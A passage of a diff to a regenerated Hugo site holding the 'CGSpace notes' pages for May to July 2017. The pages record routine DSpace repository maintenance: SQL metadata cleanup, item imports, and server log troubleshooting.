/18&#39;, &#39;10947/38&#39;, &#39;10947/19&#39;, &#39;10947/39&#39;, &#39;10947/40&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/2512&#39;, &#39;10947/44&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/45&#39;, &#39;10947
/46&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/2518&#39;, &#39;10947/2776&#39;, &#39;10947/2790&#39;, &#39;10947/2521&#39;,
&#39;10947/2522&#39;, &#39;10947/2782&#39;, &#39;10947/2525&#39;, &#39;10947/2836&#39;, &#39;10947/2524&#39;, &#39;10947/2878&#39;, &#39;10947/2520&#39;, &#39;10947/2523&#39;, &#39;10947/2786&#39;, &#39;10947/2631&#39;, &#39;10947/2589&#39;, &#39;109
47/2519&#39;, &#39;10947/2708&#39;, &#39;10947/2526&#39;, &#39;10947/2871&#39;, &#39;10947/2527&#39;, &#39;10947/4467&#39;, &#39;10947/3457&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2533&#39;, &#39;10947/2530&#39;, &#39;10947/2
531&#39;, &#39;10947/2532&#39;, &#39;10947/2538&#39;, &#39;10947/2534&#39;, &#39;10947/2540&#39;, &#39;10947/2900&#39;, &#39;10947/2539&#39;, &#39;10947/2784&#39;, &#39;10947/2536&#39;, &#39;10947/2805&#39;, &#39;10947/2541&#39;, &#39;10947/2535&#39;
, &#39;10947/2537&#39;, &#39;10568/93761&#39;)));
</code></pre><ul>
<li>To get a CSV (with counts) from that:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*)
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*)
from metadatavalue
where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author')
where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;)
AND resource_type_id = 2
AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10947/2', '10947/3', '10947/10', '10947/4', '10947/5', '10947/6', '10947/7', '10947/8', '10947/9', '10947/11', '10947/25', '10947/12', '10947/26', '10947/27', '10947/28', '10947/29', '10947/30', '10947/13', '10947/14', '10947/15', '10947/16', '10947/31', '10947/32', '10947/33', '10947/34', '10947/35', '10947/36', '10947/37', '10947/17', '10947/18', '10947/38', '10947/19', '10947/39', '10947/40', '10947/41', '10947/42', '10947/43', '10947/2512', '10947/44', '10947/20', '10947/21', '10947/45', '10947/46', '10947/47', '10947/48', '10947/49', '10947/22', '10947/23', '10947/24', '10947/50', '10947/51', '10947/2518', '10947/2776', '10947/2790', '10947/2521', '10947/2522', '10947/2782', '10947/2525', '10947/2836', '10947/2524', '10947/2878', '10947/2520', '10947/2523', '10947/2786', '10947/2631', '10947/2589', '10947/2519', '10947/2708', '10947/2526', '10947/2871', '10947/2527', '10947/4467', '10947/3457', '10947/2528', '10947/2529', '10947/2533', '10947/2530', '10947/2531', '10947/2532', '10947/2538', '10947/2534', '10947/2540', '10947/2900', '10947/2539', '10947/2784', '10947/2536', '10947/2805', '10947/2541', '10947/2535', '10947/2537', '10568/93761'))) group by text_value order by count desc) to /tmp/cgiar-librar-authors.csv with csv;
AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10947/2&#39;, &#39;10947/3&#39;, &#39;10947/10&#39;, &#39;10947/4&#39;, &#39;10947/5&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;, &#39;10947/11&#39;, &#39;10947/25&#39;, &#39;10947/12&#39;, &#39;10947/26&#39;, &#39;10947/27&#39;, &#39;10947/28&#39;, &#39;10947/29&#39;, &#39;10947/30&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/38&#39;, &#39;10947/19&#39;, &#39;10947/39&#39;, &#39;10947/40&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/2512&#39;, &#39;10947/44&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/45&#39;, &#39;10947/46&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/2518&#39;, &#39;10947/2776&#39;, &#39;10947/2790&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2782&#39;, &#39;10947/2525&#39;, &#39;10947/2836&#39;, &#39;10947/2524&#39;, &#39;10947/2878&#39;, &#39;10947/2520&#39;, &#39;10947/2523&#39;, &#39;10947/2786&#39;, &#39;10947/2631&#39;, &#39;10947/2589&#39;, &#39;10947/2519&#39;, &#39;10947/2708&#39;, &#39;10947/2526&#39;, &#39;10947/2871&#39;, &#39;10947/2527&#39;, &#39;10947/4467&#39;, &#39;10947/3457&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2533&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2538&#39;, &#39;10947/2534&#39;, &#39;10947/2540&#39;, &#39;10947/2900&#39;, &#39;10947/2539&#39;, &#39;10947/2784&#39;, &#39;10947/2536&#39;, &#39;10947/2805&#39;, &#39;10947/2541&#39;, &#39;10947/2535&#39;, &#39;10947/2537&#39;, &#39;10568/93761&#39;))) group by text_value order by count desc) to /tmp/cgiar-librar-authors.csv with csv;
</code></pre><h2 id="2017-05-23">2017-05-23</h2>
<ul>
<li>Add Affiliation to filters on Listing and Reports module (<a href="https://github.com/ilri/DSpace/pull/325">#325</a>)</li>
@ -326,7 +326,7 @@ AND resource_id IN (select item_id from collection2item where collection_id IN (
<li>For now I&rsquo;ve suggested that they just change the collection names and that we fix their metadata manually afterwards</li>
<li>Also, they have a lot of messed up values in their <code>cg.subject.wle</code> field so I will clean up some of those first:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id=119) to /tmp/wle.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id=119) to /tmp/wle.csv with csv;
COPY 111
</code></pre><ul>
<li>Respond to Atmire message about ORCIDs, saying that right now we&rsquo;d prefer to just have them available via REST API like any other metadata field, and that I&rsquo;m available for a Skype</li>
@ -343,21 +343,21 @@ COPY 111
<li>Communicate with MARLO people about progress on exposing ORCIDs via the REST API, as it is set to be discussed in the <a href="https://wiki.lyrasis.org/display/cmtygp/DCAT+Meeting+June+2017">June, 2017 DCAT meeting</a></li>
<li>Find all of Amos Omore&rsquo;s author name variations so I can link them to his authority entry that has an ORCID:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like 'Omore, A%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like &#39;Omore, A%&#39;;
</code></pre><ul>
<li>Set the authority for all variations to one containing an ORCID:</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority='4428ee88-90ef-4107-b837-3c0ec988520b', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Omore, A%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;4428ee88-90ef-4107-b837-3c0ec988520b&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Omore, A%&#39;;
UPDATE 187
</code></pre><ul>
<li>Next I need to do Edgar Twine:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like 'Twine, E%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like &#39;Twine, E%&#39;;
</code></pre><ul>
<li>But it doesn&rsquo;t look like any of his existing entries are linked to an authority which has an ORCID, so I edited the metadata via &ldquo;Edit this Item&rdquo; and looked up his ORCID and linked it there</li>
<li>Now I should be able to set his name variations to the new authority:</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority='f70d0a01-d562-45b8-bca3-9cf7f249bc8b', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Twine, E%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;f70d0a01-d562-45b8-bca3-9cf7f249bc8b&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Twine, E%&#39;;
</code></pre><ul>
<li>Run the corrections on CGSpace and then update discovery / authority</li>
<li>I notice that there are a handful of <code>java.lang.OutOfMemoryError: Java heap space</code> errors in the Catalina logs on CGSpace, I should go look into that&hellip;</li>
@ -391,15 +391,15 @@ UPDATE 187
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -7,7 +7,7 @@
<meta property="og:title" content="June, 2017" />
<meta property="og:description" content="2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg." />
<meta property="og:description" content="2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-06/" />
<meta property="article:published_time" content="2017-06-01T10:14:52+03:00" />
@ -17,8 +17,8 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="June, 2017"/>
<meta name="twitter:description" content="2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg."/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="twitter:description" content="2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg."/>
<meta name="generator" content="Hugo 0.133.1">
@ -48,12 +48,12 @@
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -100,7 +100,7 @@
<time datetime="2017-06-01T10:14:52+03:00">Thu Jun 01, 2017</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -133,7 +133,7 @@
<li>dc.format.extent: <code>value.replace(&quot;p. &quot;, &quot;&quot;).split(&quot;-&quot;)[1].toNumber() - value.replace(&quot;p. &quot;, &quot;&quot;).split(&quot;-&quot;)[0].toNumber()</code></li>
</ul>
</li>
<li>Finally, after some filtering to see which small outliers there were (based on dc.format.extent using &ldquo;p. 1-14&rdquo; vs &ldquo;29 p.&quot;), create a new column with last page number:
<li>Finally, after some filtering to see which small outliers there were (based on dc.format.extent using &ldquo;p. 1-14&rdquo; vs &ldquo;29 p.&rdquo;), create a new column with last page number:
<ul>
<li><code>cells[&quot;dc.page.from&quot;].value.toNumber() + cells[&quot;dc.format.pages&quot;].value.toNumber()</code></li>
</ul>
@ -153,7 +153,7 @@
<li>17 of the items have issues with incorrect page number ranges, and upon closer inspection they do not appear in the referenced PDF</li>
<li>I&rsquo;ve flagged them and proceeded without them (752 total) on DSpace Test:</li>
</ul>
<pre><code>$ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/93843 --source /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &amp;&gt; /tmp/ciat-books.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/93843 --source /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &amp;&gt; /tmp/ciat-books.log
</code></pre><ul>
<li>I went and did some basic sanity checks on the remaining items in the CIAT Book Chapters and decided they are mostly fine (except one duplicate and the flagged ones), so I imported them to DSpace Test too (162 items)</li>
<li>Total items in CIAT Book Chapters is 914, with the others being flagged for some reason, and we should send that back to CIAT</li>
@ -167,7 +167,7 @@
<li>Created a new branch with just the relevant changes, so I can send it to them</li>
<li>One thing I noticed is that there is a failed database migration related to CUA:</li>
</ul>
<pre><code>+----------------+----------------------------+---------------------+---------+
<pre tabindex="0"><code>+----------------+----------------------------+---------------------+---------+
| Version | Description | Installed on | State |
+----------------+----------------------------+---------------------+---------+
| 1.1 | Initial DSpace 1.1 databas | | PreInit |
@ -213,15 +213,15 @@
</li>
<li>Finally import 914 CIAT Book Chapters to CGSpace in two batches:</li>
</ul>
<pre><code>$ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &amp;&gt; /tmp/ciat-books.log
$ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books2.map &amp;&gt; /tmp/ciat-books2.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &amp;&gt; /tmp/ciat-books.log
$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books2.map &amp;&gt; /tmp/ciat-books2.log
</code></pre><h2 id="2017-06-25">2017-06-25</h2>
<ul>
<li>WLE has said that one of their Phase II research themes is being renamed from <code>Regenerating Degraded Landscapes</code> to <code>Restoring Degraded Landscapes</code></li>
<li>Pull request with the changes to <code>input-forms.xml</code>: <a href="https://github.com/ilri/DSpace/pull/329">#329</a></li>
<li>As of now it doesn&rsquo;t look like there are any items using this research theme so we don&rsquo;t need to do any updates:</li>
</ul>
<pre><code>dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=237 and text_value like 'Regenerating Degraded Landscapes%';
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=237 and text_value like &#39;Regenerating Degraded Landscapes%&#39;;
text_value
------------
(0 rows)
@ -233,7 +233,7 @@ $ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; [dspace]/bin/dspace impo
<ul>
<li>CGSpace went down briefly, I see lots of these errors in the dspace logs:</li>
</ul>
<pre><code>Java stacktrace: java.util.NoSuchElementException: Timeout waiting for idle object
<pre tabindex="0"><code>Java stacktrace: java.util.NoSuchElementException: Timeout waiting for idle object
</code></pre><ul>
<li>After looking at the Tomcat logs, Munin graphs, and PostgreSQL connection stats, it seems there is just a high load</li>
<li>Might be a good time to adjust DSpace&rsquo;s database connection settings, like I first mentioned in April, 2017 after reading the <a href="https://wiki.lyrasis.org/display/cmtygp/DCAT+Meeting+April+2017">2017-04 DCAT comments</a></li>
@ -270,15 +270,15 @@ $ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; [dspace]/bin/dspace impo
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -36,7 +36,7 @@ Merge changes for WLE Phase II theme rename (#329)
Looking at extracting the metadata registries from ICARDA&rsquo;s MEL DSpace database so we can compare fields with CGSpace
We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the output into quasi XML:
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -66,12 +66,12 @@ We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -118,7 +118,7 @@ We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the
<time datetime="2017-07-01T18:03:52+03:00">Sat Jul 01, 2017</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -132,7 +132,7 @@ We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the
<li>Looking at extracting the metadata registries from ICARDA&rsquo;s MEL DSpace database so we can compare fields with CGSpace</li>
<li>We can use PostgreSQL&rsquo;s extended output format (<code>-x</code>) plus <code>sed</code> to format the output into quasi XML:</li>
</ul>
<pre><code>$ psql dspacenew -x -c 'select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=5 order by element, qualifier;' | sed -r 's:^-\[ RECORD (.*) \]-+$:&lt;/dc-type&gt;\n&lt;dc-type&gt;\n&lt;schema&gt;cg&lt;/schema&gt;:;s:([^ ]*) +\| (.*): &lt;\1&gt;\2&lt;/\1&gt;:;s:^$:&lt;/dc-type&gt;:;1s:&lt;/dc-type&gt;\n::'
<pre tabindex="0"><code>$ psql dspacenew -x -c &#39;select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=5 order by element, qualifier;&#39; | sed -r &#39;s:^-\[ RECORD (.*) \]-+$:&lt;/dc-type&gt;\n&lt;dc-type&gt;\n&lt;schema&gt;cg&lt;/schema&gt;:;s:([^ ]*) +\| (.*): &lt;\1&gt;\2&lt;/\1&gt;:;s:^$:&lt;/dc-type&gt;:;1s:&lt;/dc-type&gt;\n::&#39;
</code></pre><ul>
<li>The <code>sed</code> script is from a post on the <a href="https://www.postgresql.org/message-id/437E44A5.508%40ultimeth.com">PostgreSQL mailing list</a></li>
<li>Abenet says the ILRI board wants to be able to have &ldquo;lead author&rdquo; for every item, so I&rsquo;ve whipped up a WIP test in the <code>5_x-lead-author</code> branch</li>
@ -151,11 +151,11 @@ We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the
<li>Adjust WLE Research Theme to include both Phase I and II on the submission form according to editor feedback (<a href="https://github.com/ilri/DSpace/pull/330">#330</a>)</li>
<li>Generate list of fields in the current CGSpace <code>cg</code> scheme so we can record them properly in the metadata registry:</li>
</ul>
<pre><code>$ psql dspace -x -c 'select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=2 order by element, qualifier;' | sed -r 's:^-\[ RECORD (.*) \]-+$:&lt;/dc-type&gt;\n&lt;dc-type&gt;\n&lt;schema&gt;cg&lt;/schema&gt;:;s:([^ ]*) +\| (.*): &lt;\1&gt;\2&lt;/\1&gt;:;s:^$:&lt;/dc-type&gt;:;1s:&lt;/dc-type&gt;\n::' &gt; cg-types.xml
<pre tabindex="0"><code>$ psql dspace -x -c &#39;select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=2 order by element, qualifier;&#39; | sed -r &#39;s:^-\[ RECORD (.*) \]-+$:&lt;/dc-type&gt;\n&lt;dc-type&gt;\n&lt;schema&gt;cg&lt;/schema&gt;:;s:([^ ]*) +\| (.*): &lt;\1&gt;\2&lt;/\1&gt;:;s:^$:&lt;/dc-type&gt;:;1s:&lt;/dc-type&gt;\n::&#39; &gt; cg-types.xml
</code></pre><ul>
<li>CGSpace was unavailable briefly, and I saw this error in the DSpace log file:</li>
</ul>
<pre><code>2017-07-05 13:05:36,452 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
<pre tabindex="0"><code>2017-07-05 13:05:36,452 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
org.postgresql.util.PSQLException: FATAL: remaining connection slots are reserved for non-replication superuser connections
</code></pre><ul>
<li>Looking at the <code>pg_stat_activity</code> table I saw there were indeed 98 active connections to PostgreSQL, and at this time the limit is 100, so that makes sense</li>
@ -163,7 +163,7 @@ org.postgresql.util.PSQLException: FATAL: remaining connection slots are reserve
<li>Abenet said she was generating a report with Atmire&rsquo;s CUA module, so it could be due to that?</li>
<li>Looking in the logs I see this random error again that I should report to DSpace:</li>
</ul>
<pre><code>2017-07-05 13:50:07,196 ERROR org.dspace.statistics.SolrLogger @ COUNTRY ERROR: EU
<pre tabindex="0"><code>2017-07-05 13:50:07,196 ERROR org.dspace.statistics.SolrLogger @ COUNTRY ERROR: EU
</code></pre><ul>
<li>Seems to come from <code>dspace-api/src/main/java/org/dspace/statistics/SolrLogger.java</code></li>
</ul>
@ -211,7 +211,7 @@ org.postgresql.util.PSQLException: FATAL: remaining connection slots are reserve
<ul>
<li>Move two top-level communities to be sub-communities of ILRI Projects</li>
</ul>
<pre><code>$ for community in 10568/2347 10568/25209; do /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child=&quot;$community&quot;; done
<pre tabindex="0"><code>$ for community in 10568/2347 10568/25209; do /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child=&#34;$community&#34;; done
</code></pre><ul>
<li>Discuss CGIAR Library data cleanup with Sisay and Abenet</li>
</ul>
@ -241,16 +241,16 @@ org.postgresql.util.PSQLException: FATAL: remaining connection slots are reserve
<ul>
<li>Looks like the final list of metadata corrections for CCAFS project tags will be:</li>
</ul>
<pre><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-FP4_CRMWestAfrica';
update metadatavalue set text_value='FP3_VietnamLED' where resource_type_id=2 and metadata_field_id=134 and text_value='FP3_VeitnamLED';
update metadatavalue set text_value='PII-FP1_PIRCCA' where resource_type_id=2 and metadata_field_id=235 and text_value='PII-SEA_PIRCCA';
delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-WA_IntegratedInterventions';
<pre tabindex="0"><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-FP4_CRMWestAfrica&#39;;
update metadatavalue set text_value=&#39;FP3_VietnamLED&#39; where resource_type_id=2 and metadata_field_id=134 and text_value=&#39;FP3_VeitnamLED&#39;;
update metadatavalue set text_value=&#39;PII-FP1_PIRCCA&#39; where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-SEA_PIRCCA&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-WA_IntegratedInterventions&#39;;
</code></pre><ul>
<li>Now just waiting to run them on CGSpace, and then apply the modified input forms after Macaroni Bros give me an updated list</li>
<li>Temporarily increase the nginx upload limit to 200MB for Sisay to upload the CIAT presentations</li>
<li>Looking at CGSpace activity page, there are 52 Baidu bots concurrently crawling our website (I copied the activity page to a text file and grep it)!</li>
</ul>
<pre><code>$ grep 180.76. /tmp/status | awk '{print $5}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep 180.76. /tmp/status | awk &#39;{print $5}&#39; | sort | uniq | wc -l
52
</code></pre><ul>
<li>From looking at the <code>dspace.log</code> I see they are all using the same session, which means our Crawler Session Manager Valve is working</li>
@ -275,15 +275,15 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -60,7 +60,7 @@ This was due to newline characters in the dc.description.abstract column, which
I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using g/^$/d
Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -90,12 +90,12 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
<!-- combined, minified CSS -->
